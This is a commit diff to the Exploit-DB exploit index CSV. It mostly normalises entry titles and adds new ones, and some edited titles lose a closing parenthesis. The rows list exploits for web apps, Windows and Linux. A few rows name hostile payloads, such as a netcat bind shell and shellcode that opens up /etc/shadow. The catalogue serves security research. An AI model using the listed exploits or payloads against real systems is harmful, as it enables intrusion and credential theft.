DB: 2016-03-22

14 new exploits

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit
Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit

phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit)
phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit

vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit)
vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit

WordPress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)
WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit

Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit)
Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit

Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (metasploit)
Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit

Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities
Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities

IDEAL Administration 2009 9.7 - Buffer Overflow - Metasploit Universal
IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)

PHP RapidKill Pro 5.x Shell Upload Vulnerability
PHP RapidKill Pro 5.x - Shell Upload Vulnerability

Shellcode - Win32 MessageBox (Metasploit module)
Shellcode - Win32 MessageBox (Metasploit)

Php Nuke 8.x.x - BlindSQL Injection Vulnerability
PHP-Nuke 8.x.x - BlindSQL Injection Vulnerability

Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)
Integard Pro 2.2.0.9026 - Windows 7 ROP-Code  (Metasploit)

Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module
Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)

MaticMarket 2.02 for PHP Nuke LFI Vulnerability
MaticMarket 2.02 for PHP-Nuke - LFI Vulnerability

Microsoft Word 2003 - Record Parsing Buffer Overflow (Metasploit) (MS09-027)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)

Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (Metasploit) (0day)
Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0day) (Metasploit)

Metasploit 4.1.0 Web UI stored XSS Vulnerability
Metasploit 4.1.0 Web UI - Stored XSS Vulnerability

PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability
PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability

Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)
Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit

PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty
PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty

PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability
PHP-Nuke 5.x - Error Message Web Root Disclosure Vulnerability

PHP Nuke 8.2.4 - CSRF Vulnerability
PHP-Nuke 8.2.4 - CSRF Vulnerability

DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability
DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability

PHP Nuke 0-7 Double Hex Encoded Input Validation Vulnerability
PHP-Nuke 0-7 - Double Hex Encoded Input Validation Vulnerability

PHP 4.x/5.x Html_Entity_Decode() Information Disclosure Vulnerability
PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability

Western Digital Arkeia Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit)

Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit

Apache + PHP 5.x (< 5.3.12 / < 5.4.2) - Remote Code Execution (Multithreaded Scanner)
Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)

PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability
PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability

GNU bash Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection (Metasploit)

Bash - CGI RCE (Metasploit) Shellshock Exploit
Bash - CGI RCE Shellshock Exploit (Metasploit)

Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)
Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)
Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
WordPress eBook Download Plugin 1.1 - Directory Traversal
WordPress Import CSV Plugin 1.0 - Directory Traversal
WordPress Abtest Plugin - Local File Inclusion
Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit
Disc ORGanizer - DORG - Multiple Vulnerabilities
D-Link DWR-932 Firmware 4.00 - Authentication Bypass
Xoops 2.5.7.2 - Arbitrary User Deletions CSRF
Xoops 2.5.7.2 - Directory Traversal Bypass
WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure
Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit
Dating Pro Genie 2015.7 - CSRF Vulnerabilities
iTop 2.2.1 - CSRF Vulnerability
ProjectSend r582 - Multiple XSS Vulnerabilities
This commit is contained in:
Offensive Security 2016-03-22 05:02:50 +00:00
parent 47d7100c18
commit 2c01698aec
17 changed files with 1047 additions and 491 deletions

View file

@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0
1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0
1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0
1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0
1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0
@ -920,7 +920,7 @@ id,file,description,date,author,platform,type,port
1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0
1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0
1112,platforms/asp/webapps/1112.txt,"Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0
1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0
1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit",2005-07-19,str0ke,php,webapps,0
1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555
1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0
1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0
@ -937,7 +937,7 @@ id,file,description,date,author,platform,type,port
1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523
1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070
1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit)",2005-08-03,str0ke,php,webapps,0
1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit",2005-08-03,str0ke,php,webapps,0
1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0
1135,platforms/php/webapps/1135.c,"PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0
1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer Denial of Service Exploit",2005-08-05,basher13,windows,dos,0
@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port
1142,platforms/php/webapps/1142.php,"WordPress <= 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0
1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0
1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0
1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0
1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit",2005-08-10,str0ke,php,webapps,0
1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000
1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
@ -967,7 +967,7 @@ id,file,description,date,author,platform,type,port
1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0
1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0
1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0
1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit)",2005-08-19,Optyx,solaris,remote,0
1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit",2005-08-19,Optyx,solaris,remote,0
1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow Vulnerability",2005-08-19,ATmaCA,windows,local,0
1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0
1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0
@ -1391,7 +1391,7 @@ id,file,description,date,author,platform,type,port
1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0
1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0
1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0
1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (metasploit)",2006-04-10,Inkubus,php,webapps,0
1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit",2006-04-10,Inkubus,php,webapps,0
1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0
1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - Remote SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0
1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0
@ -2213,7 +2213,7 @@ id,file,description,date,author,platform,type,port
2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0
2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0
2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include Vulnerability",2006-10-11,Zickox,php,webapps,0
2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability",2006-10-12,v1per-haCker,php,webapps,0
2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0
@ -9618,7 +9618,7 @@ id,file,description,date,author,platform,type,port
10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0
10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0
10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0
10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - Metasploit Universal",2009-12-06,dookie,windows,local,0
10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0
10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0
10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0
10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0
@ -11212,7 +11212,7 @@ id,file,description,date,author,platform,type,port
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard SQL Injection Vulnerability",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla Component com_pandafminigames SQL Injection Vulnerabilities",2010-04-16,Valentin,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x Shell Upload Vulnerability",2010-04-17,DigitALL,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Shell Upload Vulnerability",2010-04-17,DigitALL,php,webapps,0
12273,platforms/windows/dos/12273.py,"Windows 7/2008R2 SMB Client Trans2 - Stack Overflow 10-020 PoC",2010-04-17,"laurent gaffie",windows,dos,0
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
12276,platforms/php/webapps/12276.txt,"redaxo CMS 4.2.1 - Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0
@ -12056,7 +12056,7 @@ id,file,description,date,author,platform,type,port
13642,platforms/windows/shellcode/13642.txt,"Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes",2010-03-18,czy,windows,shellcode,0
13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0
13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit module)",2010-03-24,corelanc0d3r,win32,shellcode,0
13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit)",2010-03-24,corelanc0d3r,win32,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0
13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
@ -12788,7 +12788,7 @@ id,file,description,date,author,platform,type,port
14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
@ -13092,7 +13092,7 @@ id,file,description,date,author,platform,type,port
15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
@ -13173,7 +13173,7 @@ id,file,description,date,author,platform,type,port
15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0
15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - (.m3u) Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0
15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0
15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0
15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0
15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80
15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0
15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
@ -13704,7 +13704,7 @@ id,file,description,date,author,platform,type,port
15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) LFI Vulnerability",2010-12-19,Sid3^effects,php,webapps,0
15781,platforms/php/webapps/15781.txt,"Inout Webmail Script Persistent XSS Vulnerability",2010-12-20,Sid3^effects,php,webapps,0
15782,platforms/windows/local/15782.pl,"Word Splash Pro <= 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0
15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP Nuke LFI Vulnerability",2010-12-20,xer0x,php,webapps,0
15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - LFI Vulnerability",2010-12-20,xer0x,php,webapps,0
15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET Auth Bypass Vulnerability",2010-12-20,"Sense of Security",asp,webapps,0
15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional BoF (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0
15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0
@ -14954,7 +14954,7 @@ id,file,description,date,author,platform,type,port
17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (Metasploit) (MS09-027)",2011-04-16,"Andrew King",windows,local,0
17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0
17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection Vulnerability",2011-04-17,"vir0e5 ",php,webapps,0
17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0
@ -15282,7 +15282,7 @@ id,file,description,date,author,platform,type,port
17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
17587,platforms/php/webapps/17587.txt,"Link Station Pro Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (Metasploit) (0day)",2011-07-31,mr_me,windows,remote,0
17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0day) (Metasploit)",2011-07-31,mr_me,windows,remote,0
17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0
17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0
@ -15646,7 +15646,7 @@ id,file,description,date,author,platform,type,port
18008,platforms/windows/dos/18008.html,"Opera <= 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0
18009,platforms/asp/webapps/18009.txt,"Pre Studio Business Cards Designer SQL Injection",2011-10-20,dr_zig,asp,webapps,0
18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0
18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
@ -18039,7 +18039,7 @@ id,file,description,date,author,platform,type,port
20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0
20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,dos,0
20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0
20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0
20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0
20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
@ -18250,7 +18250,7 @@ id,file,description,date,author,platform,type,port
20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0
20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0
20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0
20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0
20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit",2001-06-21,"NSFOCUS Security Team",windows,remote,0
20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0
20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0
20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0
@ -18333,7 +18333,7 @@ id,file,description,date,author,platform,type,port
21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password Vulnerability",2001-07-26,John,windows,remote,0
21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 Anonymous Multiple FTP Command Buffer Overflow Vulnerability",2001-07-25,andreas,windows,remote,0
21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD Vulnerability",2001-06-23,zen-parse,linux,remote,0
